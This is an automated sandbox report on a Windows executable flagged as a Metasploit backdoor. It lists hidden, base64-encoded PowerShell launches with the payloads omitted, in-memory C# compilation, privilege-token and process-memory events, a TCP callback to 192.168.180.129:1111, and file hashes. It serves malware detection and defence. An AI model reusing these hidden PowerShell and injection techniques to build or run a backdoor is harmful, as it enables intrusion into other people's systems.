Malware Analysis Report

2024-09-23 03:50

Sample ID 240527-24dy4sdd91
Target 6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517
SHA256 6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517
Tags
metasploit backdoor execution trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517

Threat Level: Known bad

The file 6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517 was found to be: Known bad.

Malicious Activity Summary

metasploit backdoor execution trojan

MetaSploit

Command and Scripting Interpreter: PowerShell

Checks computer location settings

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-05-27 23:07

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-27 23:07

Reported

2024-05-27 23:10

Platform

win7-20231129-en

Max time kernel

149s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517.exe"

Signatures

MetaSploit

trojan backdoor metasploit

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2392 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2392 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2392 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 3048 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 3048 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 3048 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3048 wrote to memory of 2584 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 3048 wrote to memory of 2584 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 3048 wrote to memory of 2584 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 3048 wrote to memory of 2584 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2584 wrote to memory of 2592 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2584 wrote to memory of 2592 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2584 wrote to memory of 2592 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2584 wrote to memory of 2592 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2592 wrote to memory of 2672 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2592 wrote to memory of 2672 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2592 wrote to memory of 2672 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2592 wrote to memory of 2672 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

Processes

C:\Users\Admin\AppData\Local\Temp\6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517.exe

"C:\Users\Admin\AppData\Local\Temp\6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -window hidden -EncodedCommand [Base64-encoded command omitted]

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -window hidden -EncodedCommand [Base64-encoded command omitted]

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -enc [Base64-encoded command omitted]

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\i4es6ow6.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES142D.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC142C.tmp"

Network

Country Destination Domain Proto
N/A 192.168.180.129:1111 tcp

Files

memory/2392-0-0x000000013F580000-0x000000013F5A3000-memory.dmp

memory/1956-5-0x000007FEF534E000-0x000007FEF534F000-memory.dmp

memory/1956-6-0x000000001B610000-0x000000001B8F2000-memory.dmp

memory/1956-7-0x0000000002390000-0x0000000002398000-memory.dmp

memory/1956-8-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 9db305db7c86664669f95fc653bc1999
SHA1 34dfe6b0cbdab397796e1df46a36c3667575cffa
SHA256 caaca6a90d57aa54e0fcc5c3e33026cc468079b71fa69a8f37f44056e3e4d9a9
SHA512 02e09a9cb9b742f475e22204e2d64cda37967a843179c441d327ad15ae856d71fa77b67bd9fbacdda1f40899cda763f856e5e62c2c9efda50da6dbdc976d141f

memory/1956-14-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp

memory/1956-15-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\i4es6ow6.cmdline

MD5 7f51f8377bdf2738e36092859da55930
SHA1 d47bb97f54303b5fda3987d1cec5bb93cefe2096
SHA256 cc2665b036c88aa7379c38a4df69512b777a9ec5fb46dc71496045439b16c833
SHA512 ecd7c39cd86d838574e89af08f3022e6e1f81501ec63222542530f6c6d52835f2d217c5f37aefe79e7f8c8065009f618e82e3f84fc41a3c8d1c6e0161f1bfbad

\??\c:\Users\Admin\AppData\Local\Temp\i4es6ow6.0.cs

MD5 7319070c34daa5f6f2ece2dfc07119ee
SHA1 f26a4a48518a5608e93c8b77368f588b0433973c
SHA256 b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc
SHA512 34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

C:\Users\Admin\AppData\Local\Temp\RES142D.tmp

MD5 ccdf7db87fb98a829ce809ab1a8d7cff
SHA1 36352686766d36ac18f216245ae5d6c9d94fc4f7
SHA256 fe1189b9a2310710f8d72303b874def5113253233b3ee4c27a52f36f90295190
SHA512 ff678d923baa7238b8c9eca5db5d6b6b0b78b48ee9a09b9586793efaa8d1375649df3d42a18791afa9046e749e4bc75adbc011e479fe78730b57486e96ca3527

C:\Users\Admin\AppData\Local\Temp\i4es6ow6.pdb

MD5 3dd00aa00a39029e37b178445d6eb69f
SHA1 082960a5d887ea1547194c2ca53911601f3c8411
SHA256 498fe8706ba781296e86532f786f4e76262795531a789d64a57cd0938da353fa
SHA512 e15b4d6a93da74866ecf377a4bea1ef004f244fa22543633683e851138fcf8691beddecf9b9696d898d0ac39271607f9fc18613d167e9f355f001c11e0aa8e8f

C:\Users\Admin\AppData\Local\Temp\i4es6ow6.dll

MD5 1a4272232dd9d95ec83d0b54154eda6d
SHA1 67e11388b363d2b1148c1dee3887d702b135f558
SHA256 769f6e6160c95e7950b247dd0b902e9e1a3fdf0fb51d5ca47205a393bb110823
SHA512 bdf11f024104041196684d0ad51b0240c1a31c7d670ce2583651009c394c0e981633d2975589eb60e8fba371a7fd5d0df13bf2f141e181c5a6f363acb245cedd

\??\c:\Users\Admin\AppData\Local\Temp\CSC142C.tmp

MD5 368fcd34ae10040f74a472a90ecf7b06
SHA1 726edb32727095fe4713d2dcc9b4cc78dab40655
SHA256 4119f6db05ce0c706d0eeff14bade0bb6df61f010cca89a24302a9f287d3bde4
SHA512 5b35d125d85a10e648205595bba0324c0218a2ea2bc076a9ae4012af3fa97f86722d936d15e500c362ffbd900aa212539c46f70de6f22295b12c155ee97ba6de

memory/2584-33-0x0000000002C30000-0x0000000002C31000-memory.dmp

memory/1956-34-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-27 23:07

Reported

2024-05-27 23:10

Platform

win10v2004-20240426-en

Max time kernel

148s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517.exe"

Signatures

MetaSploit

trojan backdoor metasploit

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1728 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1728 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3020 wrote to memory of 2572 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3020 wrote to memory of 2572 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2572 wrote to memory of 1896 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2572 wrote to memory of 1896 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2572 wrote to memory of 1896 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1896 wrote to memory of 2348 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 1896 wrote to memory of 2348 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 1896 wrote to memory of 2348 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 2348 wrote to memory of 2148 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2348 wrote to memory of 2148 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2348 wrote to memory of 2148 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Processes

C:\Users\Admin\AppData\Local\Temp\6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517.exe

"C:\Users\Admin\AppData\Local\Temp\6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -window hidden -EncodedCommand [Base64-encoded command omitted]

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -window hidden -EncodedCommand [Base64-encoded command omitted]

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -enc [Base64-encoded command omitted]

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xf4jrptd\xf4jrptd.cmdline"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4F0A.tmp" "c:\Users\Admin\AppData\Local\Temp\xf4jrptd\CSC94DF806A913F4A66B93AB611688E484B.TMP"

Network

Country Destination Domain Proto
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
N/A 192.168.180.129:1111 tcp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 52.111.227.11:443 tcp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 91.16.208.104.in-addr.arpa udp

Files

memory/1728-0-0x00007FF7A2E00000-0x00007FF7A2E23000-memory.dmp

memory/3020-1-0x00007FFAEE693000-0x00007FFAEE695000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o4di4z1c.z5g.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3020-8-0x00000238BA170000-0x00000238BA192000-memory.dmp

memory/3020-12-0x00007FFAEE690000-0x00007FFAEF151000-memory.dmp

memory/3020-13-0x00007FFAEE690000-0x00007FFAEF151000-memory.dmp

memory/2572-23-0x00007FFAEE690000-0x00007FFAEF151000-memory.dmp

memory/2572-24-0x00007FFAEE690000-0x00007FFAEF151000-memory.dmp

memory/2572-25-0x00007FFAEE690000-0x00007FFAEF151000-memory.dmp

memory/1896-26-0x0000000003000000-0x0000000003036000-memory.dmp

memory/1896-27-0x0000000005740000-0x0000000005D68000-memory.dmp

memory/1896-29-0x0000000005F20000-0x0000000005F86000-memory.dmp

memory/1896-30-0x0000000005F90000-0x0000000005FF6000-memory.dmp

memory/1896-28-0x0000000005630000-0x0000000005652000-memory.dmp

memory/1896-40-0x0000000006100000-0x0000000006454000-memory.dmp

memory/1896-41-0x00000000065E0000-0x00000000065FE000-memory.dmp

memory/1896-42-0x0000000006630000-0x000000000667C000-memory.dmp

memory/1896-44-0x0000000006B20000-0x0000000006B3A000-memory.dmp

memory/1896-43-0x0000000007E20000-0x000000000849A000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\xf4jrptd\xf4jrptd.cmdline

MD5 1b1f1112c06e556df074221940af90e0
SHA1 0a2b467ce09ad6af036eb0b5d4952addb171dd5a
SHA256 e3a47020301b443b26d6450097d04056002e230505419d8ffeb9a026b7d28e2c
SHA512 c77935e8a20d14b4280d8f836fca5344b2afa5fe84a33889240204fdc88872e18feff9c3e8f7506a866082bdea86900146752ca8969d85ad0b309b6f4a325a49

\??\c:\Users\Admin\AppData\Local\Temp\xf4jrptd\xf4jrptd.0.cs

MD5 7319070c34daa5f6f2ece2dfc07119ee
SHA1 f26a4a48518a5608e93c8b77368f588b0433973c
SHA256 b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc
SHA512 34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

\??\c:\Users\Admin\AppData\Local\Temp\xf4jrptd\CSC94DF806A913F4A66B93AB611688E484B.TMP

MD5 339996f6c731ccdf41bf1b38ec7d3f76
SHA1 7397eb2f415c73d2ec6799a67c73ac3e3e3f382b
SHA256 6190466ee0ba64a08b8670add1a10289a9c6aab6ea9e7dc4037d6b1c3fc0eea9
SHA512 8a7100953106afd221e7c2130a9caa1c2e97b73554ef1fdd6d9beb8a380403395166800d1997bace99d01a0e0f013a7dabb1133b0f36bf07089672ba14501f2b

C:\Users\Admin\AppData\Local\Temp\RES4F0A.tmp

MD5 709dfc10d9b8d54e429407f95a75f529
SHA1 a3c00faf2594622d8dde4bc9cc0a8897285f28b2
SHA256 f258c05c2cfff69d29ca782a6a7a8ff68c211aa7adc90408bb54d784f16d84da
SHA512 36bbdc8e8f691e5534b2db5fdea5004c272212e0494c0a72a94419e2ad11b50582855cee5b995bf396d432f273cba66d845c72a94606253adbd9061f1864f566

memory/1896-57-0x0000000006B90000-0x0000000006B98000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xf4jrptd\xf4jrptd.dll

MD5 1454ccec910d4fc8f29103e737a2d8bb
SHA1 c497f3392a4b743db8c703f6c3611d52bd6838f2
SHA256 ed6a866c20ab33166e5b8ef1fa5d16c73f57aef2e667644bfd54b6960d8c7d8e
SHA512 fdaba9bc1559106812e93be91b11413595705ba95378867a17a6ee8cb71946cffd21d0f549c97ca6816e15a0ba07160cac6521efb7dd072d0dcd84b62c53b4a8

memory/1896-59-0x00000000077C0000-0x00000000077C1000-memory.dmp

memory/3020-60-0x00007FFAEE690000-0x00007FFAEF151000-memory.dmp

memory/2572-62-0x00007FFAEE690000-0x00007FFAEF151000-memory.dmp